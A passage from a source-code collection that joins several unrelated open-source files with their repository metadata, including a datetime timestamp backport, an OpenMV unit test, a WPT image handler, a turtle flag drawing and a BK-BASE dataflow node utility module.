BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Python 3.4 datetime.timestamp() implementation
"""
import datetime
import time
ZERO = datetime.timedelta(0)
class _UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
_utc = _UTC()
_EPOCH = datetime.datetime(1970, 1, 1, tzinfo=_utc)
def timestamp(dt):
"""
Return POSIX timestamp as float.
>>> timestamp(datetime.datetime.now()) > 1494638812
True
"""
if dt.tzinfo is None:
return (
time.mktime((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, -1, -1, -1)) + dt.microsecond / 1e6
)
else:
return (dt - _EPOCH).total_seconds()
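if __name__ == "__main__":
    # Small usage sketch: a UTC-aware datetime yields a deterministic POSIX
    # timestamp, while a naive one is interpreted in the local timezone.
    aware = datetime.datetime(2021, 1, 1, tzinfo=_utc)
    print(timestamp(aware))  # 1609459200.0
    print(timestamp(datetime.datetime.now()))  # current local time as a float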
|
b1d1f7d528dd84ae4f3b8a863f69cbc4c934b061
|
fbdc48c28e54fb33ae4842ef95ff63893902c99a
|
/scripts/unittest/script/11-find_lines.py
|
166f1e796c5f1aae2112d6ae67bc65d21e164247
|
[
"MIT"
] |
permissive
|
openmv/openmv
|
44d4b79fc8693950a2e330e5e0fd95b5c36e230f
|
8a90e070a88b7fc14c87a00351b9c4a213278419
|
refs/heads/master
| 2023-08-30T20:59:57.227603
| 2023-08-23T16:50:55
| 2023-08-23T16:50:55
| 14,360,940
| 2,150
| 1,226
|
MIT
| 2023-09-14T07:18:15
| 2013-11-13T10:23:44
|
C
|
UTF-8
|
Python
| false
| false
| 473
|
py
|
11-find_lines.py
|
def unittest(data_path, temp_path):
import image
img = image.Image("unittest/data/shapes.ppm", copy_to_fb=True)
lines = img.find_lines(threshold = 5000, theta_margin = 25, rho_margin = 25)
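    # each line tuple unpacks as (x1, y1, x2, y2, length, magnitude, theta, rho)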
return len(lines) == 4 and\
lines[0][0:] == (22, 0, 22, 119, 119, 8670, 0, 22) and\
lines[1][0:] == (0, 39, 159, 39, 159, 8670, 90, 39) and\
lines[2][0:] == (57, 0, 57, 119, 119, 8670, 0, 57) and\
lines[3][0:] == (0, 75, 159, 75, 159, 10710, 90, 75)
|
a67a5e3a8be7b8502fb768621512b144c55027be
|
ebec36c2280a1aac0624019133bffe7152f09964
|
/benchmarks/pretraining_morphologizer_oscar/scripts/reset.py
|
def34298fdbd78fa646e60188efa3b4b97c1fc45
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
explosion/projects
|
8d783d5b150f03b6a68f345f1a50b3a692ff1745
|
e24a085669b4db6918ffeb2752846089d8dee57a
|
refs/heads/v3
| 2023-08-09T14:10:08.949067
| 2023-07-31T11:43:44
| 2023-07-31T11:43:44
| 223,165,649
| 1,171
| 492
|
MIT
| 2023-08-11T13:31:24
| 2019-11-21T12:08:52
|
Python
|
UTF-8
|
Python
| false
| false
| 543
|
py
|
reset.py
|
import shutil
from pathlib import Path
import typer
from wasabi import Printer
msg = Printer()
def main(path: Path):
"""This script is used to delete directories and reset the project"""
if path.is_dir():
answer = input(f"Are you sure you want to reset {path} (y)")
if answer.lower().strip() == "y":
try:
shutil.rmtree(path)
msg.good(f"Deleted directory {path}")
except Exception as e:
print(e)
if __name__ == "__main__":
typer.run(main)
|
2df870c83ed552096994d3bf8342716084490922
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/images/blue-png-cachable.py
|
6d8556542ab50d3e8c9dc163ddd2e41bec8f774e
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
blue-png-cachable.py
|
import os
from wptserve.utils import isomorphic_decode
def main(request, response):
"""Serves the contents in blue.png but with a Cache-Control header.
    Emits a Cache-Control header with max-age set to 1h to allow the browser
    to cache the image. Used for testing behaviors involving caching logic.
"""
image_path = os.path.join(os.path.dirname(isomorphic_decode(__file__)), u"blue.png")
response.headers.set(b"Cache-Control", b"max-age=3600")
response.headers.set(b"Content-Type", b"image/png")
response.content = open(image_path, mode='rb').read()
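# A quick manual check of the behavior above (a sketch; the URL assumes a
# locally running wptserve instance, whose port may differ per setup):
#
#     import requests
#     r = requests.get('http://localhost:8000/images/blue-png-cachable.py')
#     assert r.headers['Cache-Control'] == 'max-age=3600'
#     assert r.headers['Content-Type'] == 'image/png'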
|
403884b477d79363eddc08bfdcceeb0fff0086a7
|
55c5e55612f2d04294c02cec728729bdb1b323c8
|
/yeke/py-cflag/china_flag.py
|
e47448db41319bac58a122018fb0c30d326152ac
|
[] |
no_license
|
JustDoPython/python-examples
|
4efc9e3aafd533938b23012dbc72aeb175a87744
|
d4159751a86b1e9ce7867d0a7f1c12e8b8e0f213
|
refs/heads/master
| 2023-03-16T01:34:24.219119
| 2023-03-08T10:37:33
| 2023-03-08T10:37:33
| 249,331,676
| 423
| 423
| null | 2023-02-17T07:49:04
| 2020-03-23T04:00:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,020
|
py
|
china_flag.py
|
import turtle
turtle.setup(600,400,0,0)
turtle.bgcolor("red")
turtle.fillcolor("yellow")
turtle.color('yellow')
turtle.speed(10)
# main star
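# turning right 144 degrees after each edge traces a five-pointed star:
# 5 * 144 = 720 degrees, i.e. two full turns of the pen's heading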
turtle.begin_fill()
turtle.up()
turtle.goto(-280,100)
turtle.down()
for i in range (5):
turtle.forward(150)
turtle.right(144)
turtle.end_fill()
# secondary stars
turtle.begin_fill()
turtle.up()
turtle.goto(-100,180)
turtle.setheading(305)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.left(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-50,110)
turtle.setheading(30)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.right(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-40,50)
turtle.setheading(5)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.right(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-100,10)
turtle.setheading(300)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.left(144)
turtle.end_fill()
turtle.hideturtle()
turtle.done()
|
9b6f5c18268e947c6acf01267a79e6c70ee9b19e
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/dataflow/flow/handlers/node_utils.py
|
b2daf4ba33a9cc76e7927c0de2bb81f03141ab9d
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 29,642
|
py
|
node_utils.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from common.exceptions import ApiResultError
from django.utils.translation import ugettext as _
from dataflow.flow import exceptions as Errors
from dataflow.flow.handlers.node_factory import NODE_FACTORY
from dataflow.flow.models import FlowJob, FlowLinkInfo, FlowNodeInfo, FlowNodeRelation
from dataflow.flow.node_types import NodeTypes
from dataflow.pizza_settings import DEFAULT_HDFS_TAG
from dataflow.shared.auth.auth_helper import AuthHelper
from dataflow.shared.meta.tag.tag_helper import TagHelper
from dataflow.shared.resourcecenter.resourcecenter_helper import ResourceCenterHelper
from dataflow.shared.storekit.storekit_helper import StorekitHelper
from dataflow.udf.functions.function_driver import is_modify_with_udf_released
class NodeUtils(object):
def __init__(self):
pass
@staticmethod
def update_job_id(flow_id, node_id, job_id, job_type):
FlowJob.objects.update_or_create(
defaults={
"flow_id": flow_id,
"node_id": node_id,
"job_id": job_id,
"job_type": job_type,
"description": "创建任务",
},
node_id=node_id,
)
@staticmethod
def get_project_cluster_groups(project_id, resource_type, service_type=None, private_only=True):
"""
        :return: the project's private cluster group list
"""
cluster_groups = NodeUtils.get_cluster_groups_by_resource_type(project_id, resource_type, service_type)
if not cluster_groups:
raise Errors.FlowError(_("获取当前项目的集群组信息为空(project_id=%s)") % project_id)
private_cluster_groups = []
public_cluster_groups = []
other_cluster_groups = []
for one_cluster_group in cluster_groups:
if one_cluster_group["scope"] == "private":
private_cluster_groups.append(one_cluster_group)
elif one_cluster_group["scope"] == "public":
public_cluster_groups.append(one_cluster_group)
else:
other_cluster_groups.append(one_cluster_group)
if not public_cluster_groups:
raise Errors.FlowError(_("获取当前项目的公有集群组信息为空(project_id=%s)") % project_id)
if private_only:
return private_cluster_groups
else:
return private_cluster_groups + public_cluster_groups + other_cluster_groups
@staticmethod
def get_cluster_groups_by_resource_type(project_id, resource_type, service_type):
"""获取指定项目的特定 resource_type 下特定 service_type 的集群组列表
:param project_id:
:param resource_type: processing / storage
:param service_type: [stream, batch] / [hdfs]
:return:
"""
# get geog_area
geog_area_code = TagHelper.get_geog_area_code_by_project(project_id)
# get all cluster groups
cluster_groups = AuthHelper.list_project_cluster_group(project_id)
result_cluster_groups = []
        # iterate over every cluster_group the project is authorized to use
for one_cluster_group in cluster_groups:
            # fetch the resource_group_id
resource_group_id_data = ResourceCenterHelper.get_res_group_id_by_cluster_group(
one_cluster_group["cluster_group_id"], geog_area_code
)
resource_group_id = None
if resource_group_id_data:
resource_group_id = resource_group_id_data[0]["resource_group_id"]
if not resource_group_id:
continue
            # fetch the cluster info for this resource_type
clusters_data = ResourceCenterHelper.get_cluster_info(geog_area_code, resource_group_id, resource_type)
if clusters_data:
for one_cluster in clusters_data:
                    # keep cluster_groups whose clusters include the stream / batch service types
if one_cluster["service_type"] in service_type:
result_cluster_groups.append(one_cluster_group)
break
return result_cluster_groups
@staticmethod
def get_storage_cluster_name(project_id, storage_type, result_table_id=None, tag=DEFAULT_HDFS_TAG):
"""
        Get the cluster_name for the node's storage type.
        If the result table already has storage of that type, return the cluster_name of that existing storage directly.
        :param project_id:
        :param storage_type:
        :param result_table_id: if non-empty, return the cluster_name of the cluster holding this rt's storage of the given type
        :param tag: defaults to DEFAULT_HDFS_TAG
:return:
"""
if result_table_id:
            # if an rt is given, fetch the info of the storage cluster it lives on
default_storage_config = None
try:
default_storage_config = StorekitHelper.get_physical_table(result_table_id, storage_type)
except BaseException:
                # ignore the exception when the rt has no storage of this type
pass
if default_storage_config:
return default_storage_config["cluster_name"]
_return_cluster_group = None
private_cluster_groups = NodeUtils.get_project_cluster_groups(
project_id, "storage", service_type=[storage_type]
)
for cluster_group in private_cluster_groups:
response_data = StorekitHelper.get_storage_cluster_configs(storage_type, cluster_group["cluster_group_id"])
            # for HDFS/TDW storage there should be only one candidate cluster
if len(response_data) > 1:
raise Exception(
_("配置错误,项目%(project_id)s, 默认 %(storage_type)s 存储集群数量(%(storage_config_size)s)不唯一")
% {
"project_id": project_id,
"storage_type": storage_type,
"storage_config_size": len(response_data),
}
)
if response_data:
_return_cluster_group = response_data[0]["cluster_name"]
if not _return_cluster_group:
            # fall back to the default storage
geog_area_code = TagHelper.get_geog_area_code_by_project(project_id)
default_storage_cluster = StorekitHelper.get_default_storage(storage_type, geog_area_code, tag=tag)
if default_storage_cluster:
_return_cluster_group = default_storage_cluster["cluster_name"]
else:
raise Errors.FlowError(
_("获取当前项目的默认存储集群组信息为空(project_id=%s,geog_area_code=%s, storage_type=%s, tag=%s)")
% (project_id, geog_area_code, storage_type, tag)
)
return _return_cluster_group
@staticmethod
def get_related_nodes_by_rt(result_table_id, node_category=None):
"""
        Get every node whose output is result_table_id
@param result_table_id:
@param node_category:
@return:
"""
if not node_category:
related_source_nodes = FlowNodeRelation.objects.filter(result_table_id=result_table_id)
else:
related_source_nodes = FlowNodeRelation.objects.filter(
node_type__in=node_category, result_table_id=result_table_id
)
return related_source_nodes
@staticmethod
def get_related_source_nodes(node_handler, related_category=NodeTypes.SOURCE_CATEGORY):
"""
        Get the data-source nodes that consume the result tables produced by the current processing node
@return:
"""
if node_handler.node_type not in NodeTypes.PROCESSING_CATEGORY:
return []
related_source_nodes = FlowNodeRelation.objects.filter(
node_type__in=related_category,
result_table_id__in=node_handler.result_table_ids,
)
return related_source_nodes
@staticmethod
def list_from_nodes_handler(from_node_ids):
"""
        Look up node handlers by a list of node IDs
"""
return [NODE_FACTORY.get_node_handler(_node_id) for _node_id in from_node_ids]
@staticmethod
def get_to_nodes_handler_by_id(node_id):
return [
NODE_FACTORY.get_node_handler(_id)
for _id in FlowLinkInfo.objects.filter(from_node_id=node_id).values_list("to_node_id", flat=True)
]
@staticmethod
def get_storage_upstream_node_handler(node_id):
"""
        Get the upstream node of a storage node; there is exactly one
"""
from_node_id = FlowLinkInfo.objects.filter(to_node_id=node_id)[0].from_node_id
return NODE_FACTORY.get_node_handler(from_node_id)
@staticmethod
def get_stream_to_nodes_handler_by_id(flow_id, node_id, node_types):
"""
        Return the downstream node_ids of the node identified by flow_id and node_id
:param flow_id:
:param node_id:
        :param node_types: set of node types to filter on
:return:
"""
ret = []
for _id in FlowLinkInfo.objects.filter(flow_id=flow_id, from_node_id=node_id).values_list(
"to_node_id", flat=True
):
one_node_handler = NODE_FACTORY.get_node_handler(_id)
if one_node_handler.node_type in node_types:
ret.append(_id)
return ret
@staticmethod
def gene_version():
"""
        Generate a unique version number
"""
return FlowNodeInfo.gene_version()
@staticmethod
def validate_config(params, form_class, is_create):
"""
        Validate parameters
        @param {dict} params the parameters
        @param {object} form_class the Form class used to validate the parameters
"""
form = form_class(params, is_create)
if not form.is_valid():
err_msg = _("参数不对")
if hasattr(form, "format_errmsg"):
err_msg = form.format_errmsg()
raise Errors.NodeValidError(err_msg)
return form.cleaned_data
@staticmethod
def get_from_result_table_ids(node_type, node_config, specified_from_node_id=None):
"""
        Get the list of source result tables of the current node
        @param node_type: node type
        @param node_config: node config
        @param specified_from_node_id: if given, return only the input RTs of this upstream node
"""
from_result_table_ids = []
if node_type in NodeTypes.NEW_FROM_RESULT_TABLE_IDS_CATEGORY + NodeTypes.NEW_INPUTS_CATEGORY:
            # new-style node config
for from_result_table in NodeUtils.get_input_nodes_config(node_type, node_config):
if specified_from_node_id:
if str(from_result_table["id"]) == str(specified_from_node_id):
return from_result_table["from_result_table_ids"]
else:
from_result_table_ids.extend(from_result_table["from_result_table_ids"])
else:
if specified_from_node_id:
return NODE_FACTORY.get_node_handler(specified_from_node_id).result_table_ids
elif "from_result_table_ids" in node_config:
                # legacy node config
from_result_table_ids = node_config["from_result_table_ids"]
return from_result_table_ids
@staticmethod
def get_input_nodes_config(node_type, config):
"""
[
{
"id": 22771,
"from_result_table_ids": [
"591_test_1_clean"
]
},
{
"id": 22772,
"from_result_table_ids": [
"591_test_2_clean"
]
}
]
:param node_type:
:param config:
:return:
"""
if "inputs" in config:
return config["inputs"]
elif "from_nodes" in config:
return config["from_nodes"]
elif "from_result_table_ids" in config:
return [{"id": 0, "from_result_table_ids": config["from_result_table_ids"]}]
else:
raise Errors.NodeValidError(_("节点的数据result table列表参数不正确"))
@staticmethod
def set_input_nodes_config(node_type, config, from_nodes_info):
"""
[
{
"id": 22771,
"from_result_table_ids": [
"591_test_1_clean"
]
},
{
"id": 22772,
"from_result_table_ids": [
"591_test_2_clean"
]
}
]
:param from_nodes_info:
:param node_type:
:param config:
:return:
"""
if node_type in NodeTypes.NEW_INPUTS_CATEGORY:
config["inputs"] = from_nodes_info
return config
else:
config["from_nodes"] = from_nodes_info
return config
@staticmethod
def get_upstream_nodes_info(node_type, from_node_ids, form_data):
"""
        When saving or updating a node, get the info of its upstream nodes, used to build the metadata
"""
upstream_nodes_info = []
        # nodes with reworked parameters: the future unified flow form, with multi-input / multi-output RTs
if node_type in NodeTypes.NEW_FROM_RESULT_TABLE_IDS_CATEGORY + NodeTypes.NEW_INPUTS_CATEGORY:
for from_result_table in NodeUtils.get_input_nodes_config(node_type, form_data):
upstream_node = NODE_FACTORY.get_node_handler(from_result_table["id"])
if upstream_node.node_type in NodeTypes.ALL_KV_SOURCE_CATEGORY:
continue
upstream_nodes_info.append(
{
"upstream_node": upstream_node,
"result_table_id": from_result_table["from_result_table_ids"],
}
)
else:
for _n in NodeUtils.list_from_nodes_handler(from_node_ids):
                # kv-type upstream nodes require no metadata updates
if _n.node_type in NodeTypes.ALL_KV_SOURCE_CATEGORY:
continue
upstream_nodes_info.append(
{
"upstream_node": _n,
"result_table_id": list(set(_n.result_table_ids) & set(form_data["from_result_table_ids"])),
}
)
return upstream_nodes_info
@staticmethod
def transform_time_unit_to_day(window_size, window_size_unit, window_offset, window_offset_unit):
        # convert everything to hours first, then compute the difference
window_size_in_hour = 0
if window_size_unit == "hour":
window_size_in_hour = int(window_size)
elif window_size_unit == "day":
window_size_in_hour = int(window_size) * 24
elif window_size_unit == "week":
window_size_in_hour = int(window_size) * 24 * 7
elif window_size_unit == "month":
window_size_in_hour = int(window_size) * 24 * 31
window_offset_in_hour = 0
if window_offset_unit == "hour":
window_offset_in_hour = int(window_offset)
elif window_offset_unit == "day":
window_offset_in_hour = int(window_offset) * 24
elif window_offset_unit == "week":
window_offset_in_hour = int(window_offset) * 24 * 7
elif window_offset_unit == "month":
window_offset_in_hour = int(window_offset) * 24 * 31
max_delay_in_hour = window_offset_in_hour + window_size_in_hour
return int(max_delay_in_hour / 24) + 1
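    # Worked example for the conversion above: window_size=2 'day' (48h) with
    # window_offset=1 'hour' gives max_delay_in_hour = 49, so the method
    # returns int(49 / 24) + 1 = 3 days.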
@staticmethod
def get_max_window_size_by_day(form_data):
"""
        Get the data window size of the node's computation, in days, used to set
        the HDFS expiry of this node and its downstream nodes.
        1. For fixed windows
            1. With a unified config, the window size is converted as follows:
                a. unit is hour: divide by 24 and add 1 (to absorb inexact division)
                b. unit is week: take 7
                c. unit is month: take 31
                d. unit is day: take the window size itself
            2. With a custom config, the same unit rules apply and the larger result is taken
        2. For accumulating windows, return 1
@param form_data:
@return:
"""
# batch_window_config = {
# 'window_type': '',
# 'dependency_config_type': '',
# 'unified_config': {
# 'window_size_period': '',
# 'window_size': ''
# },
# 'custom_config': {
# 'result_table_id': {
# 'window_size_period': '',
# 'window_size': ''
# }
# }
# }
        # TODO align the parameters of the various batch-type nodes later
if "window_type" not in form_data and "window_config" in form_data:
            # batch indicator node
form_data = form_data["window_config"]
elif "schedule_config" in form_data and "serving_scheduler_params" in form_data["schedule_config"]:
            # time-series custom node
return int(form_data["schedule_config"]["serving_scheduler_params"]["data_period"])
elif "serving_scheduler_params" in form_data:
            # modelflow node: default to 1; the caller's max(7, 1) then yields 7 days
return 1
if "node_type" in form_data and form_data["node_type"] == "batchv2":
            # batchv2 node
max_window_size = 0
for one_window_info in form_data["window_info"]:
window_type = one_window_info["window_type"]
if window_type == "scroll" or window_type == "whole":
window_size = form_data["dedicated_config"]["schedule_config"]["count_freq"]
window_size_unit = form_data["dedicated_config"]["schedule_config"]["schedule_period"]
else:
window_size = one_window_info["window_size"]
window_size_unit = one_window_info["window_size_unit"]
if window_type == "whole":
window_offset = "0"
window_offset_unit = "hour"
else:
window_offset = one_window_info["window_offset"]
window_offset_unit = one_window_info["window_offset_unit"]
window_size_in_day = NodeUtils.transform_time_unit_to_day(
window_size, window_size_unit, window_offset, window_offset_unit
)
if window_size_in_day > max_window_size:
max_window_size = window_size_in_day
return max_window_size
else:
            # legacy batch node
if form_data["window_type"] == "accumulate_by_hour":
return 1
else:
if form_data["dependency_config_type"] == "unified":
if form_data["unified_config"]["window_size_period"] == "hour":
return int(form_data["unified_config"]["window_size"] / 24) + 1
elif form_data["unified_config"]["window_size_period"] == "week":
return 7
elif form_data["unified_config"]["window_size_period"] == "month":
return 31
else:
return int(form_data["unified_config"]["window_size"])
else:
max_window_size = 0
for result_table_id, config in list(form_data["custom_config"].items()):
if config["window_size_period"] == "hour":
current_window_size = config["window_size"] / 24 + 1
elif config["window_size_period"] == "week":
current_window_size = 7
elif config["window_size_period"] == "month":
current_window_size = 31
else:
current_window_size = config["window_size"]
if max_window_size < int(current_window_size):
max_window_size = int(current_window_size)
return max_window_size
@staticmethod
def get_max_related_window_size(result_table_id):
"""
        Get the maximum time window size among the downstream batch nodes of all nodes whose output is result_table_id
@param result_table_id:
@return:
"""
max_window_size_by_day = 0
        # fetch the nodes related to result_table_id (restricted to types valid upstream of batch nodes)
related_nodes = NodeUtils.get_related_nodes_by_rt(result_table_id)
for related_node in related_nodes:
to_nodes = NodeUtils.get_to_nodes_handler_by_id(related_node.node_id)
for to_node in to_nodes:
if to_node.node_type in [
NodeTypes.BATCH,
NodeTypes.BATCHV2,
NodeTypes.MODEL_APP,
NodeTypes.DATA_MODEL_BATCH_INDICATOR,
]:
to_node_max_window_size_by_day = NodeUtils.get_max_window_size_by_day(to_node.get_config(False))
if to_node_max_window_size_by_day > max_window_size_by_day:
max_window_size_by_day = to_node_max_window_size_by_day
return max_window_size_by_day
@staticmethod
def is_modify_dp_node_with_udf(processing_id):
"""
        Check whether the node is a stream or batch node (one that may use UDFs)
        whose UDF version differs from the latest released version; if so, it needs to be modified
        :return: True (needs modification), False (no modification needed)
"""
return is_modify_with_udf_released(processing_id)
@staticmethod
def build_from_nodes_list(from_node_ids):
"""
        Assemble the result tables (static or not) that the from-table identifiers in the SQL refer to
@param from_node_ids:
@return:
"""
from_nodes = [NODE_FACTORY.get_node_handler(_id) for _id in from_node_ids]
not_static_rt_ids = []
static_rt_ids = []
source_rt_ids = []
for _node in from_nodes:
_table_info = {
"category": _node.node_type,
"result_table_ids": _node.result_table_ids,
}
parent_node_type = _table_info["category"]
if parent_node_type in NodeTypes.STREAM_KV_SOURCE_CATEGORY:
static_rt_ids.extend(_table_info["result_table_ids"])
else:
not_static_rt_ids.extend(_table_info["result_table_ids"])
if parent_node_type in NodeTypes.SOURCE_CATEGORY:
source_rt_ids.extend(_table_info["result_table_ids"])
return not_static_rt_ids, static_rt_ids, source_rt_ids
@staticmethod
def filter_batch(node_handlers):
"""
        Filter the batch nodes out of a list of nodes; for storage data nodes,
        the associated computing node must be found
        @param node_handlers list of nodes
"""
        # pick out the batch-type nodes
_from_node_handlers = list(
filter(
lambda _n: _n.node_type in NodeTypes.BATCH_CATEGORY + NodeTypes.BATCH_SOURCE_CATEGORY,
node_handlers,
)
)
batch_nodes = []
for one_from_node_handler in _from_node_handlers:
if one_from_node_handler.node_type in NodeTypes.BATCH_CATEGORY:
batch_nodes.append(one_from_node_handler)
elif one_from_node_handler.node_type in NodeTypes.BATCH_SOURCE_CATEGORY:
_origin_node = one_from_node_handler.get_rt_generated_node()
                # when a stream node feeds HDFS storage, the RT it produces can serve as the result table of a batch data-source node
if _origin_node is not None and _origin_node.node_type in NodeTypes.BATCH_CATEGORY:
batch_nodes.append(_origin_node)
return batch_nodes
@staticmethod
def get_origin_batch_node(node_handler):
"""
        Walk the node parent/child relations to find a batch node's starting
        node, defined here as the root "batch" node. Two scenarios must be
        considered:
        1. Scenario one (F's root batch node is C)
            A(stream) -> B(HDFS) -> C(batch) -> D(batch) -> E(batch)
                                      |
                                      v
                                    F(batch)
        2. Scenario two (H's root batch node is C)
            A(stream) -> B(HDFS) -> C(batch rt_c)
            D(storage data rt_c) -> E(batch) -> F(batch) -> G(batch)
                                                  |
                                                  v
                                                H(batch)
"""
candidate_node = node_handler
while True:
batch__from_nodes = NodeUtils.filter_batch(candidate_node.get_from_nodes_handler())
if not batch__from_nodes:
break
            # not the root batch node yet: take any parent as the next candidate and keep walking
candidate_node = batch__from_nodes[0]
return candidate_node
@staticmethod
def get_storage_cluster_groups(storage_type, cluster_name):
"""
        Get the cluster group that a storage cluster belongs to, by cluster name
"""
res_data = StorekitHelper.get_storage_cluster_config(storage_type, cluster_name)
if not res_data:
raise ApiResultError(
_("存储集群信息未包含集群%(cluster_name)s,存储类型%(storage_type)s信息.")
% {"cluster_name": cluster_name, "storage_type": storage_type}
)
cluster_groups = [res_data["cluster_group"]]
return cluster_groups
@staticmethod
def check_expires(node_type, from_nodes, form_data):
"""
        Validate that the configured expiry time is legal
        HDFS:
        1. If the upstream is a batch computation, check that the expiry is no less than its data window size
        2. If the upstream RT is linked as a data source, check whether other downstream batch nodes use it, and compute the maximum data window size
"""
if "expires" not in form_data or form_data["expires"] == -1:
return True
if node_type in [NodeTypes.HDFS_STORAGE]:
for from_node in from_nodes:
if from_node.node_type in [
NodeTypes.BATCH,
NodeTypes.BATCHV2,
NodeTypes.MODEL_APP,
NodeTypes.DATA_MODEL_BATCH_INDICATOR,
]:
max_window_size_by_day = NodeUtils.get_max_window_size_by_day(from_node.get_config(False))
if form_data["expires"] < max_window_size_by_day:
raise Errors.NodeError(_("存储过期时间应大于或等于上游离线节点数据窗口长度"))
max_related_window_size = NodeUtils.get_max_related_window_size(form_data["result_table_id"])
if form_data["expires"] < max_related_window_size:
raise Errors.NodeError(_("当前结果表被离线计算使用,过期时间应大于或等于其数据窗口长度(%s天)") % max_related_window_size)
@staticmethod
def get_rt_related_storage_node(flow_id, result_table_ids):
"""
        Get the ids of the storage nodes related to a given rt in the current flow (nodes whose from_result_table_ids contain the rt)
"""
ret = []
nodes = FlowNodeInfo.objects.filter(flow_id=flow_id)
for node in nodes:
node_id = node.node_id
node_type = node.node_type
if node_type not in NodeTypes.STORAGE_CATEGORY:
continue
node_config = node.load_config(True, loading_concurrently=True)
if "from_result_table_ids" in node_config:
from_result_table_ids = [x.encode("utf-8") for x in node_config["from_result_table_ids"]]
if set(result_table_ids) <= set(from_result_table_ids):
ret.append(node_id)
return ret
|
e9b5cf30945d8503b8a688683122588394e256fc
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Geometry/HcalEventSetup/python/CaloTowerGeometryDBReader_cfi.py
|
1ae683aed2ab16c397750fef305fd0f62c7b8b04
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 239
|
py
|
CaloTowerGeometryDBReader_cfi.py
|
import FWCore.ParameterSet.Config as cms
CaloTowerGeometryFromDBEP = cms.ESProducer( "CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
|
9a9579db432af7043bbc12b987154660fa95b5bf
|
afbeee6a3a83946449e5fccf7c74457461ed921f
|
/k3d/test/test_colormap.py
|
308c1b006e5fba5512e6412570d838d965e35a77
|
[
"MIT"
] |
permissive
|
K3D-tools/K3D-jupyter
|
